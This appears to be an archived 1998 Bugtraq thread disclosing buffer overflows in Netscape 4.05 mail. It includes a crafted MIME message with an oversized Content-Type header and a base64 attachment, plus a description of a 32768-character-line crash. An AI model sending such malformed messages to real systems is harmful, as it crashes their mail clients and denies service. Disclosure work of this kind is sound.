Denial of Service Database


---------- Forwarded message ----------
From: Paul Boehm (paul@BOEHM.ORG)
To: BUGTRAQ@NETSPACE.ORG
Date: Tue, 28 Jul 1998 20:21:41 +0200
Subject: netscape mail overflow(another one)

Hi,
netscape mail crashes when trying to the attachment
from the following pseudo mime mail:

From: Paul Boehm 
To: paul@boehm.org
Subject: test
Mime-Version: 1.0
Content-Type: AAAAAAAAAAAAAAAAAAAAAA...; boundary=ABC123
--ABC123
Content-Type: text/plain; charset=us-ascii

test123

--ABC123
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="AA"

H4sIAA7jvDUAA+3OOQ6EQBBD0Y45hY9QJejiPI1EBhJiuT+LiEeaAEj+SxzYgdfR09PcLMyU
JLURdzZX3hopcm49vD6Ks/acZI8/O2zLWmYpTWUbfu/6+Y0/L+uGUn39AQAAAAAAAAAAAAAA
AADwvx2CTC7aACgAAA==

--ABC--

i suppose this is exploitable, but i don't really know.
i only tested this with win95 netscape 4.05.

bye,
    paul

--

[ Paul S. Boehm | paul@boehm.priv.at | http://paul.boehm.org/ | infected@irc ]

Money is what gives a programmer his resources. It's an exchange system created
by human beings. It surrounds us. Works for us, binds the economy together.


---------- Forwarded message ----------
From: pedward@WEBCOM.COM
To: BUGTRAQ@NETSPACE.ORG
Date: Wed, 29 Jul 1998 10:34:04 -0700
Subject: Re: netscape mail overflow(another one)

Netscape mail for Windows has an overflow in the body.  This is evident when a spammer
sends one of our customers a message with the text all on one line.  You can reproduce
by putting 32768 characters in a line, mail it to yourself, and try to download.
Netscape chokes when reading the POP box and refuses to fetch the message.  I
just use netscape mail for Unix and the problem doesn't exist (gee, I wonder why :>)

--Perry

>
> It makes perfect sense that any header field could overflow a limited buffer.
> I'd assumed that developers would have the sense to check ALL of the buffers
> used to store headers, but maybe this should be pointed out to them, just to
> make sure.
>
> We may see exploits based on bugs in UUDECODE and BinHex decoders in mailers
> as well. I'm sure they're there given the overall low quality of the code
> that these companies are generating (sigh).
>
> --Brett Glass
>
> At 08:21 PM 7/28/98 +0200, Paul Boehm wrote:

--
Perry Harrington        System Software Engineer    zelur xuniL  ()
http://www.webcom.com  perry.harrington@webcom.com  Think Blue.  /\